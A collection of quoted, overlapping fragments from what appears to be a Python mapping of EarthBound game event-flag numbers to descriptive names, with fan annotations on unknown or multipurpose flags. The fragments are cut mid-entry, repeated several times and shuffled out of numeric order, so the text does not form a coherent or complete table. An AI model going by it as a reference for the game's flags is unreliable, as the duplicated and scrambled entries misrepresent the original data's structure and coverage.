'EVERDRED_DEFEATED', 67:", "175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat", "731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737:", "517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?)", "664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670:", "expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown)", "689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695:", "226 (I hate multipurpose flags) # 227 (I hate multipurpose flags) # 228", "(Related to Lake Tess. This is only set if you're near (0x02A0, 0x0D70)", "(???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused,", "41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47:", "99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in", "you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180:", "'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death. TODO:", "485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491:", "'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', #", "'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2',", "271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277:", "'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC',", "'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES',", "561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567:", "to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686:", "433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of", "771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and", "'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2',", "# 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to", "430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another", "256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262:", "645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651:", "'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING',", "161 (???) # 162 (???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS',", "Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS',", "(???) # 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED',", "514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520:", "(???) # 321 (Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323:", "# 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162", "# Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???)", "140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer", "543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549:", "'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED',", "# 467 (Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE',", "766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to", "530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536:", "'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert", "369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371 (???) 372:", "# 679 (Something about Venus show about to start?) # 680 (Something about", "497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503:", "585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in", "'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',", "563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569:", "178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184:", "339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING',", "(I hate multipurpose flags) # 227 (I hate multipurpose flags) # 228 (I", "763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', #", "'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1',", "'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', #", "717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723:", "'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge", "'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about", "701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707:", "188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194:", "242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248:", "591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594:", "'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69:", "(Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611", "417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423:", "695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701:", "'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY',", "'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',", "'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY',", "205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211:", "622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in", "'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA',", "'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK',", "666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???)", "beginning of expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??) #", "587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) # 589 (Visibility", "478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484:", "'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER',", "'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141:", "multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239:", "Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317:", "542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548:", "233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS',", "Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?)", "'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on", "'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON',", "675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus", "(If set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1',", "558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564:", "'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4',", "'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY',", "Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',", "342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This", "363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369:", "'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND',", "'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after defeating", "first Hieroglyph Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED',", "426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???)", "698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704:", "(I hate multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I", "'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP',", "defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY',", "'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',", "127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133:", "'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',", "of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR',", "attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',", "hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel", "'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT',", "155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',", "'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539:", 